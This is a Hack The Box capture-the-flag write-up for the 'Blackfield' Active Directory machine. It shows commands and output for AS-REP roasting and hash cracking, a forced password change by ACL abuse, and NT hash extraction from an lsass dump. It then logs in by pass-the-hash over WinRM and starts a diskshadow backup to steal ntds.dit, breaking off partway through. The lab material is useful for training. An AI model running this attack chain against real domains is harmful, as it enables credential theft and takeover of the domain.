Blackfield
AD box on HTB.
Enumeration:
Port Scanning:
We will start with nmap scanning:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.229.17
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-10 15:21 +03
Nmap scan report for 10.129.229.17
Host is up, received echo-reply ttl 127 (0.13s latency).
Scanned at 2025-09-10 15:21:52 +03 for 148s
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-10 19:22:36Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windowsThis time we have less ports, but still those open ports are enough to know that this is a domain controller.
We can identify the FQDN (Fully qualified domain name) from that nmap scan, but we can also use for example netexec to view it:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ netexec smb 10.129.229.17
SMB 10.129.229.17 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)So I will add the hostname and domain and their corresponding IP address to the hosts file:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
<snipped>
10.129.229.17 DC01.BLACKFIELD.local BLACKFIELD.local DC01We do not have any interesting shares permissions with guest user:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ netexec smb dc01.blackfield.local -u 'guest' -p '' --shares
SMB 10.129.229.17 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.129.229.17 445 DC01 [+] BLACKFIELD.local\guest:
SMB 10.129.229.17 445 DC01 [*] Enumerated shares
SMB 10.129.229.17 445 DC01 Share Permissions Remark
SMB 10.129.229.17 445 DC01 ----- ----------- ------
SMB 10.129.229.17 445 DC01 ADMIN$ Remote Admin
SMB 10.129.229.17 445 DC01 C$ Default share
SMB 10.129.229.17 445 DC01 forensic Forensic / Audit share.
SMB 10.129.229.17 445 DC01 IPC$ READ Remote IPC
SMB 10.129.229.17 445 DC01 NETLOGON Logon server share
SMB 10.129.229.17 445 DC01 profiles$ READ
SMB 10.129.229.17 445 DC01 SYSVOL Logon server shareBut since we have read permissions over IPC$ share which is enough to perform some RPC queries/enumeration, including users on that system.
AS-REP Roasting:
We can use multiple tools such as netexec or impacket-lookupsid to get the users:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ impacket-lookupsid blackfield.local/guest@10.129.229.17 -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at 10.129.229.17
[*] StringBinding ncacn_np:10.129.229.17[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4194615774-2175524697-3563712290
498: BLACKFIELD\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: BLACKFIELD\Administrator (SidTypeUser)
501: BLACKFIELD\Guest (SidTypeUser)
502: BLACKFIELD\krbtgt (SidTypeUser)
512: BLACKFIELD\Domain Admins (SidTypeGroup)
513: BLACKFIELD\Domain Users (SidTypeGroup)
514: BLACKFIELD\Domain Guests (SidTypeGroup)
515: BLACKFIELD\Domain Computers (SidTypeGroup)
516: BLACKFIELD\Domain Controllers (SidTypeGroup)
517: BLACKFIELD\Cert Publishers (SidTypeAlias)
518: BLACKFIELD\Schema Admins (SidTypeGroup)
519: BLACKFIELD\Enterprise Admins (SidTypeGroup)
520: BLACKFIELD\Group Policy Creator Owners (SidTypeGroup)
521: BLACKFIELD\Read-only Domain Controllers (SidTypeGroup)
522: BLACKFIELD\Cloneable Domain Controllers (SidTypeGroup)
525: BLACKFIELD\Protected Users (SidTypeGroup)
526: BLACKFIELD\Key Admins (SidTypeGroup)
527: BLACKFIELD\Enterprise Key Admins (SidTypeGroup)
553: BLACKFIELD\RAS and IAS Servers (SidTypeAlias)
571: BLACKFIELD\Allowed RODC Password Replication Group (SidTypeAlias)
572: BLACKFIELD\Denied RODC Password Replication Group (SidTypeAlias)
1000: BLACKFIELD\DC01$ (SidTypeUser)
1101: BLACKFIELD\DnsAdmins (SidTypeAlias)
1102: BLACKFIELD\DnsUpdateProxy (SidTypeGroup)
1103: BLACKFIELD\audit2020 (SidTypeUser)
1104: BLACKFIELD\support (SidTypeUser)
1105: BLACKFIELD\BLACKFIELD764430 (SidTypeUser)
<snipped>
1412: BLACKFIELD\BLACKFIELD438814 (SidTypeUser)
1413: BLACKFIELD\svc_backup (SidTypeUser)
1414: BLACKFIELD\lydericlefebvre (SidTypeUser)
1415: BLACKFIELD\PC01$ (SidTypeUser)
1416: BLACKFIELD\PC02$ (SidTypeUser)
1417: BLACKFIELD\PC03$ (SidTypeUser)
1418: BLACKFIELD\PC04$ (SidTypeUser)
1419: BLACKFIELD\PC05$ (SidTypeUser)
1420: BLACKFIELD\PC06$ (SidTypeUser)
1421: BLACKFIELD\PC07$ (SidTypeUser)
1422: BLACKFIELD\PC08$ (SidTypeUser)
1423: BLACKFIELD\PC09$ (SidTypeUser)
1424: BLACKFIELD\PC10$ (SidTypeUser)
1425: BLACKFIELD\PC11$ (SidTypeUser)
1426: BLACKFIELD\PC12$ (SidTypeUser)
1427: BLACKFIELD\PC13$ (SidTypeUser)
1428: BLACKFIELD\SRV-WEB$ (SidTypeUser)
1429: BLACKFIELD\SRV-FILE$ (SidTypeUser)
1430: BLACKFIELD\SRV-EXCHANGE$ (SidTypeUser)
1431: BLACKFIELD\SRV-INTRANET$ (SidTypeUser)┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ netexec smb dc01.blackfield.local -u 'guest' -p '' --rid-brute
SMB 10.129.229.17 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.129.229.17 445 DC01 [+] BLACKFIELD.local\guest:
SMB 10.129.229.17 445 DC01 498: BLACKFIELD\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.229.17 445 DC01 500: BLACKFIELD\Administrator (SidTypeUser)
SMB 10.129.229.17 445 DC01 501: BLACKFIELD\Guest (SidTypeUser)
SMB 10.129.229.17 445 DC01 502: BLACKFIELD\krbtgt (SidTypeUser)
SMB 10.129.229.17 445 DC01 512: BLACKFIELD\Domain Admins (SidTypeGroup)
SMB 10.129.229.17 445 DC01 513: BLACKFIELD\Domain Users (SidTypeGroup)
SMB 10.129.229.17 445 DC01 514: BLACKFIELD\Domain Guests (SidTypeGroup)
SMB 10.129.229.17 445 DC01 515: BLACKFIELD\Domain Computers (SidTypeGroup)
SMB 10.129.229.17 445 DC01 516: BLACKFIELD\Domain Controllers (SidTypeGroup)
SMB 10.129.229.17 445 DC01 517: BLACKFIELD\Cert Publishers (SidTypeAlias)
SMB 10.129.229.17 445 DC01 518: BLACKFIELD\Schema Admins (SidTypeGroup)
SMB 10.129.229.17 445 DC01 519: BLACKFIELD\Enterprise Admins (SidTypeGroup)
SMB 10.129.229.17 445 DC01 520: BLACKFIELD\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.229.17 445 DC01 521: BLACKFIELD\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.229.17 445 DC01 522: BLACKFIELD\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.229.17 445 DC01 525: BLACKFIELD\Protected Users (SidTypeGroup)
SMB 10.129.229.17 445 DC01 526: BLACKFIELD\Key Admins (SidTypeGroup)
SMB 10.129.229.17 445 DC01 527: BLACKFIELD\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.229.17 445 DC01 553: BLACKFIELD\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.229.17 445 DC01 571: BLACKFIELD\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.229.17 445 DC01 572: BLACKFIELD\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.229.17 445 DC01 1000: BLACKFIELD\DC01$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1101: BLACKFIELD\DnsAdmins (SidTypeAlias)
SMB 10.129.229.17 445 DC01 1102: BLACKFIELD\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.229.17 445 DC01 1103: BLACKFIELD\audit2020 (SidTypeUser)
SMB 10.129.229.17 445 DC01 1104: BLACKFIELD\support (SidTypeUser)
SMB 10.129.229.17 445 DC01 1105: BLACKFIELD\BLACKFIELD764430 (SidTypeUser)
<snipped>
SMB 10.129.229.17 445 DC01 1412: BLACKFIELD\BLACKFIELD438814 (SidTypeUser)
SMB 10.129.229.17 445 DC01 1413: BLACKFIELD\svc_backup (SidTypeUser)
SMB 10.129.229.17 445 DC01 1414: BLACKFIELD\lydericlefebvre (SidTypeUser)
SMB 10.129.229.17 445 DC01 1415: BLACKFIELD\PC01$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1416: BLACKFIELD\PC02$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1417: BLACKFIELD\PC03$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1418: BLACKFIELD\PC04$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1419: BLACKFIELD\PC05$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1420: BLACKFIELD\PC06$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1421: BLACKFIELD\PC07$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1422: BLACKFIELD\PC08$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1423: BLACKFIELD\PC09$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1424: BLACKFIELD\PC10$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1425: BLACKFIELD\PC11$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1426: BLACKFIELD\PC12$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1427: BLACKFIELD\PC13$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1428: BLACKFIELD\SRV-WEB$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1429: BLACKFIELD\SRV-FILE$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1430: BLACKFIELD\SRV-EXCHANGE$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1431: BLACKFIELD\SRV-INTRANET$ (SidTypeUser)Every domain has its own SID, so how this works, it obtains the SID of the target domain, and then incrementally try to reverse lookup (SID + RID), for example the administrator has the RID of 500, it checks if S-1-5-21-4194615774-2175524697-3563712290-500 exist, and then resolve that SID to an account user.
We can save this result and using some tools to extract the users only:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ cat temp.txt | grep SidTypeUser | awk '{print $2}' | cut -d '\' -f 2 > users.txt
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ cat users.txt
Administrator
Guest
krbtgt
DC01$
audit2020
support
BLACKFIELD764430
etc...I will try to check if one of those users has no preauth required enabled using impacket-GetNPUsers, and get his asrep ticket:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield] 15:44:48 [315/1992]
└─$ impacket-GetNPUsers blackfield.local/ -usersfile users.txt
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:0a59b34b164714e0e6ce50ca664ddd8d$229f07301b37e2c13579dbf33660737f3613f60b0b9bf57625bf4a6f3e9d3e830b1e06a882603f0a5cf24529f410f92f79b
78f7e68ebdcd6366fa0590be12dee033ff12b15191d2f025638f527a01a8b95163c444b40249e8e4c301629c76651a05a6067a030780e4c728887a385420564fceb2dab344c3cc6d748410fca0954224df3cdd35880
9b67f2ae596f39c4042a29515d1f4da4c32cfe1e2994a293564ab4f69b75b04005f6714f62d8c159d3bbe02055985c706d5bb884660e19cf9e5b15941e53395cbc1d1124cb09da4f7c5726f13890cdc25de3617bdb3
a800129b295a587caa17655cb8c81db782d6b60c5******
[-] User BLACKFIELD764430 doesn't have UF_DONT_REQUIRE_PREAUTH set
<snipped>We have one of the users is as-rep roastable, lets grab his hash and attempt to crack it with hashcat:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ hashcat support.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
<snipped>
$krb5asrep$23$support@BLACKFIELD.LOCAL:0a59b34b164714e0e6ce50ca664ddd8d$229f07301b37e2c13579dbf33660737f3613f60b0b9bf57625bf4a6f3e9d3e830b1e06a882603f0a5cf24529f410f92f79b
78f7e68ebdcd6366fa0590be12dee033ff12b15191d2f025638f527a01a8b95163c444b40249e8e4c301629c76651a05a6067a030780e4c728887a385420564fceb2dab344c3cc6d748410fca0954224df3cdd35880
9b67f2ae596f39c4042a29515d1f4da4c32cfe1e2994a293564ab4f69b75b04005f6714f62d8c159d3bbe02055985c706d5bb884660e19cf9e5b15941e53395cbc1d1124cb09da4f7c5726f13890cdc25de3617bdb3
a800129b295a587caa17655cb8c81db782d6b60c5******:#00^Black******
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$support@BLACKFIELD.LOCAL:0a59b34b1647...******
Time.Started.....: Wed Sep 10 15:45:20 2025 (10 secs)
Time.Estimated...: Wed Sep 10 15:45:30 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1538.1 kH/s (0.93ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14337024/14344385 (99.95%)
Rejected.........: 0/14337024 (0.00%)
Restore.Point....: 14333952/14344385 (99.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: #1crapper -> "$&(!=
Hardware.Mon.#1..: Util: 33%
<snipped>BloodHound:
Now the time for bloodhound:
Lets ingest bloodhound data with netexec, and then upload it to bloodhound:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ netexec ldap dc01.blackfield.local -u support -p '#00^BlackKnight' --bloodhound -c all --dns-server 10.129.229.17
LDAP 10.129.229.17 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
LDAP 10.129.229.17 389 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
LDAP 10.129.229.17 389 DC01 Resolved collection methods: dcom, objectprops, acl, session, group, localadmin, container, psremote, rdp, trusts
LDAP 10.129.229.17 389 DC01 Done in 00M 39S
LDAP 10.129.229.17 389 DC01 Compressing output into /home/kali/.nxc/logs/DC01_10.129.229.17_2025-09-10_154846_bloodhound.zip
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Blackfield/bloodhound]
└─$ unzip DC01_10.129.229.17_2025-09-10_154846_bloodhound.zip
Archive: DC01_10.129.229.17_2025-09-10_154846_bloodhound.zip
extracting: DC01_10.129.229.17_2025-09-10_154846_users.json extracting: DC01_10.129.229.17_2025-09-10_154846_gpos.json
extracting: DC01_10.129.229.17_2025-09-10_154846_groups.json
extracting: DC01_10.129.229.17_2025-09-10_154846_ous.json
extracting: DC01_10.129.229.17_2025-09-10_154846_computers.json
extracting: DC01_10.129.229.17_2025-09-10_154846_domains.json
extracting: DC01_10.129.229.17_2025-09-10_154846_containers.jsonStart bloodhound:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Blackfield/bloodhound]
└─$ sudo bloodhound
[sudo] password for kali:
Starting neo4j
Neo4j is not running.
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:20694). It is available at http://localhost:7474
There may be a short delay until the server is ready.
................................................
Bloodhound will start
IMPORTANT: It will take time, please wait...
<snipped>
opening http://127.0.0.1:8080Abuse ACL:
We will find the support user that we have owned, has force change password acl over audit2020 user, I will use bloodyAD this time to change this user's password:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ bloodyAD --host 10.129.229.17 -d blackfield.local -u support -p '#00^BlackKnight' set password 'audit2020' 'Caesar3#'
[+] Password changed successfully!See if the password has been changed correctly:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ nxc smb dc01.blackfield.local -u audit2020 -p 'Caesar3#'
SMB 10.129.229.17 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.129.229.17 445 DC01 [+] BLACKFIELD.local\audit2020:Caesar3#Now if we enumerated the shares again:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ nxc smb dc01.blackfield.local -u audit2020 -p 'Caesar3#' --shares
SMB 10.129.229.17 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.129.229.17 445 DC01 [+] BLACKFIELD.local\audit2020:Caesar3#
SMB 10.129.229.17 445 DC01 [*] Enumerated shares
SMB 10.129.229.17 445 DC01 Share Permissions Remark
SMB 10.129.229.17 445 DC01 ----- ----------- ------
SMB 10.129.229.17 445 DC01 ADMIN$ Remote Admin
SMB 10.129.229.17 445 DC01 C$ Default share
SMB 10.129.229.17 445 DC01 forensic READ Forensic / Audit share.
SMB 10.129.229.17 445 DC01 IPC$ READ Remote IPC
SMB 10.129.229.17 445 DC01 NETLOGON READ Logon server share
SMB 10.129.229.17 445 DC01 profiles$ READ
SMB 10.129.229.17 445 DC01 SYSVOL READ Logon server shareWe have read permissions over an interesting share that we have not before (forensics), lets see what it has:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ impacket-smbclient blackfield.local/audit2020:'Caesar3#'@10.129.229.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# shares
ADMIN$
C$
forensic
IPC$
NETLOGON
profiles$
SYSVOL
# use forensic
# ls
drw-rw-rw- 0 Sun Feb 23 18:10:16 2020 .
drw-rw-rw- 0 Sun Feb 23 18:10:16 2020 ..
drw-rw-rw- 0 Sun Feb 23 21:14:37 2020 commands_output
drw-rw-rw- 0 Thu May 28 23:29:24 2020 memory_analysis
drw-rw-rw- 0 Sat Feb 29 01:30:34 2020 tools
# cd commands_output
# ls
drw-rw-rw- 0 Sun Feb 23 21:14:37 2020 .
drw-rw-rw- 0 Sun Feb 23 21:14:37 2020 ..
-rw-rw-rw- 528 Sun Feb 23 21:12:54 2020 domain_admins.txt
-rw-rw-rw- 962 Sun Feb 23 21:12:54 2020 domain_groups.txt
-rw-rw-rw- 16454 Sat Feb 29 01:32:17 2020 domain_users.txt
-rw-rw-rw- 518202 Sun Feb 23 21:12:54 2020 firewall_rules.txt
-rw-rw-rw- 1782 Sun Feb 23 21:12:54 2020 ipconfig.txt
-rw-rw-rw- 3842 Sun Feb 23 21:12:54 2020 netstat.txt
-rw-rw-rw- 3976 Sun Feb 23 21:12:54 2020 route.txt
-rw-rw-rw- 4550 Sun Feb 23 21:12:54 2020 systeminfo.txt
-rw-rw-rw- 9990 Sun Feb 23 21:12:54 2020 tasklist.txt
# mget *
[*] Downloading domain_admins.txt
[*] Downloading domain_groups.txt
[*] Downloading domain_users.txt
[*] Downloading firewall_rules.txt
[*] Downloading ipconfig.txt
[*] Downloading netstat.txt
[*] Downloading route.txt
[*] Downloading systeminfo.txt
[*] Downloading tasklist.txt
# cd ..
# cd tools
# ls
drw-rw-rw- 0 Sat Feb 29 01:30:34 2020 .
drw-rw-rw- 0 Sat Feb 29 01:30:34 2020 ..
drw-rw-rw- 0 Sat Feb 29 01:30:34 2020 sleuthkit-4.8.0-win32
drw-rw-rw- 0 Sat Feb 29 01:30:35 2020 sysinternals
drw-rw-rw- 0 Sat Feb 29 01:30:35 2020 volatility
# cd ..
# cd memory_analysis
# ls
drw-rw-rw- 0 Thu May 28 23:29:24 2020 .
drw-rw-rw- 0 Thu May 28 23:29:24 2020 ..
-rw-rw-rw- 37876530 Thu May 28 23:29:24 2020 conhost.zip
-rw-rw-rw- 24962333 Thu May 28 23:29:24 2020 ctfmon.zip
-rw-rw-rw- 23993305 Thu May 28 23:29:24 2020 dfsrs.zip
-rw-rw-rw- 18366396 Thu May 28 23:29:24 2020 dllhost.zip
-rw-rw-rw- 8810157 Thu May 28 23:29:24 2020 ismserv.zip
-rw-rw-rw- 41936098 Thu May 28 23:29:24 2020 lsass.zip
-rw-rw-rw- 64288607 Thu May 28 23:29:24 2020 mmc.zip
-rw-rw-rw- 13332174 Thu May 28 23:29:24 2020 RuntimeBroker.zip
-rw-rw-rw- 131983313 Thu May 28 23:29:24 2020 ServerManager.zip
-rw-rw-rw- 33141744 Thu May 28 23:29:24 2020 sihost.zip
-rw-rw-rw- 33756344 Thu May 28 23:29:24 2020 smartscreen.zip
-rw-rw-rw- 14408833 Thu May 28 23:29:24 2020 svchost.zip
-rw-rw-rw- 34631412 Thu May 28 23:29:24 2020 taskhostw.zip
-rw-rw-rw- 14255089 Thu May 28 23:29:24 2020 winlogon.zip
-rw-rw-rw- 4067425 Thu May 28 23:29:24 2020 wlms.zip
-rw-rw-rw- 18303252 Thu May 28 23:29:24 2020 WmiPrvSE.zip
# get lsass.zip
# exitIt seems some forensics investigation happened, because we can see some txt files have not useful information to us, and the tools directory has some memory forensics tools, but the third directory, we will explore an interesting zip file that is the lsass process dump which normally has some secrets we can dump and use for lateral movement for example.
Lateral Movement to svc_backup:
We can use mimikatz on our own desktop or any variations of mimiktaz, I will use pypykatz to analyze the dump the secrets contained inside lsass.dmp:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Blackfield/analysis]
└─$ pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
<snipped>I used lsa module, and specified minidump argument to tell pypykatz to use lsass.dmp dump.
Here we have svc_backup nt hash, and DC01$ nt hashes but non of them worked, also non of them was the machine itself nt hash.
We can confirm if svc_backup nt hash is still valid using netexec:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Blackfield/analysis]
└─$ nxc smb dc01.blackfield.local -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d --sam
SMB 10.129.229.17 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.129.229.17 445 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400dAlso bloodhound shows that svc_backup is member of the Remote Management Users, so we can WinRM to the target machine:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Blackfield/analysis]
└─$ evil-winrm -i 10.129.229.17 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents>Also:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.We are member of the Backup Operators, and have SeBackupPrivilege, and SeRestorePrivilege privileges, which will help us create a backup of the whole system including the ntds.dit file, and then download it with the system registry hive, and finally extract the secrets inside of it:
Privilege Escalation:
Diskshadow & robocopy:
Diskshadow creates copies of a currently used drive, while Robocopy copies files and directories from one location to another.
We will use this script alongside with diskshadow utility:
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% O:
end backupWith this script, we will create meta.cab file to store the metadata such as creation date, time, copy size, etc.
Next we will set the context of our backup to be clientaccessible, so we can access it after the script ran, and persistent which means it will persist even if the machine was rebooted.
Then we will intiate our back with begin backup, and we will include the whole C: drive.
Lastly create to start creating our backup, and expose our backup as a network drive with the letter, and finalize the backup operation with end backup.
So lets upload that script to the target machine:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload backup_script.txt
Info: Uploading /home/kali/Desktop/CTF/Machines/HackTheBox/Blackfield/backup_script.txt to C:\Users\svc_backup\Documents\backup_script.txt
Data: 240 bytes of 240 bytes copied
Info: Upload successful!I will pass that script to the diskshadow utility to create the shadow copy that will create a snapshot of the drive while the files are in use.
*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s backup_script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 9/10/2025 2:53:32 PM
-> set verbose o
SET VERBOSE { ON | OFF }
ON Turn on verbose mode. This provides information about writer inclusion/exclusion.
OFF Turn off verbose mode.
Example: SET VERBOSE ONWe will notice that it did not complete, and one of the set verbose on characters was missing, this is because linux uses LF line ending, whereas windows uses crlf, so we first need to replace lf with crlf, and to do that I will use unix2dos command:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ unix2dos backup_script.txt
unix2dos: converting file backup_script.txt to DOS format...And we will upload it again, and try to perform the backup again:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload backup_script.txt
Info: Uploading /home/kali/Desktop/CTF/Machines/HackTheBox/Blackfield/backup_script.txt to C:\Users\svc_backup\Documents\backup_script.txt
Data: 252 bytes of 252 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s backup_script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 9/10/2025 2:25:19 PM
-> set verbose on
-> set metadata C:\Windows\Temp\meta.cab
-> set context clientaccessible
-> set context persistent
